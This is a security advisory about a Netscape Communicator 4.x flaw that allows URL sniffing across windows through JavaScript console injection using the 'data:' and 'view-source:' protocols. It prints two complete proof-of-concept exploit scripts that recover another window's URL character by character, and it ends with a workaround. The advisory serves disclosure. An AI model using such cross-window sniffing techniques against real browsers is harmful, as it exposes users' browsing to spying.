COMMAND
Netscape
SYSTEMS AFFECTED
Linux, NT with NS 4.x
PROBLEM
Georgi Guninski found following bugs. There is a bug in Netscape
Communicator 4.6 Win95, 4.07 Linux (probably all 4.x are
affected), which allows sniffing URLs from another window. The
problem is the injection of JavaScript code in the JavaScript
console using the "data:" protocol. Access to document.links is
disallowed in NC 4.6, but the document may be read using find().
For more information, examine the source. Demonstration is
available at:
http://www.nat.bg/~joro/datatrack.html
Source goes like this:
<SCRIPT>
// Clear console
s='wysiwyg://1/data:text/html;,<SCRIPT>window.location = "javascript:@clear"; if (window.location=="JavaScript:@print") top.close(); error</'+'SCRIPT>';
b=window.open(s);
location="javascript:";
setTimeout("b.close();",2000);
/*
a=window.open('wysiwyg://1/about:blank');
a.location="javascript:MBEGIN";
setTimeout("a.close();",2000);
*/
tracked=window.open();
tracked.document.open();
tracked.document.write("<HTML><HEAD><TITLE>Tracked window</TITLE></HEAD>");
tracked.document.write("There is a bug in Netscape Communicator 4.6/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window.<BR>");
tracked.document.write("Type your URL in the location bar or choose a bookmark.<BR>");
tracked.document.write("Wait until the document is loaded, then click 'Show URL' in the 'Control window'.<BR>");
tracked.document.write("This exploit needs Javascript enabled.<BR>");
tracked.document.close();
</SCRIPT>
<SCRIPT>
function datatrack()
{
tracked.location="javascript:error";
s="wysiwyg://1/data:text/html;,"
+"<SCRIPT> if (document.links.length > 1) "
+"{ "
+" mend='MEND';mag='http://';res=mag;charstoread=40;"
+" msg='Your URL is: \\n';"
+ "setTimeout( ' "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+" t=res + String.fromCharCode(c);"
+" if (find(t,true,true)) {"
+" res=t;"
+" if (c==32) i=charstoread;"
+" } "
+" }"
+"}"
+"res=res.substring(mag.length);"
+"confirm(msg+res);top.close();"
+" ',4000);"
+" } else MEND;</"
+"SCRIPT>";
a=window.open(s);
setTimeout('location="javascript:";',3000);
setTimeout('a.close();',2000);
}
</SCRIPT>
Same applies with the injection of JavaScript code in the
JavaScript console using the "view-source:" protocol.
Demonstration is available at:
http://www.nat.bg/~joro/viewtrack.html
Source goes like this:
<SCRIPT>
// Clear console
function clearcon()
{
s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>xxxxx<SCRIPT>window.location = \"javascript:@clear\"; if (window.location==\"JavaScript:@print\") top.close(); error</"+"SCRIPT>'";
window.location=s;
/*
b=window.open(s);
*/
setTimeout('location="javascript:";',1000);
/*
setTimeout("b.close();",2000);
*/
}
setTimeout('clearcon()',500);
/*
a=window.open('wysiwyg://1/about:blank');
a.location="javascript:MBEGIN";
setTimeout("a.close();",2000);
*/
function writeit()
{
tracked=window.open();
tracked.document.open();
tracked.document.write("<HTML><HEAD><TITLE>Tracked window</TITLE></HEAD>");
tracked.document.write("There is a bug in Netscape Communicator 4.6/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window.<BR>");
tracked.document.write("Type your URL in the location bar or choose a bookmark.<BR>");
tracked.document.write("Wait until the document is loaded, then click 'Show URL' in the 'Control window'.<BR>");
tracked.document.write("This exploit needs Javascript enabled.<BR>");
tracked.document.close();
}
setTimeout('writeit()',3000);
</SCRIPT>
<SCRIPT>
function datatrack()
{
tracked.location="javascript:error";
s="view-source:wysiwyg://1/javascript:s='<TITLE>aa</TITLE>vvvv"
+"<SCRIPT> if (document.links.length > 1) "
+"{ "
+" mend=\"MEND\";mag=\"http://\";res=mag;charstoread=40;"
+" msg=\"Your URL is: \\n\";"
+ "setTimeout( \" "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+" t=res + String.fromCharCode(c);"
+" if (find(t,true,true)) {"
+" res=t;"
+" if (c==32) i=charstoread;"
+" } "
+" }"
+"}"
+"res=res.substring(mag.length);"
+"confirm(msg+res);top.close();"
+" \",4000);"
+" } else MEND;</"
+"SCRIPT>'";
a=window.open(s);
setTimeout('location="javascript:";',3000);
setTimeout('a.close();',2000);
}
</SCRIPT>
SOLUTION
Workaround: Disable Javascript.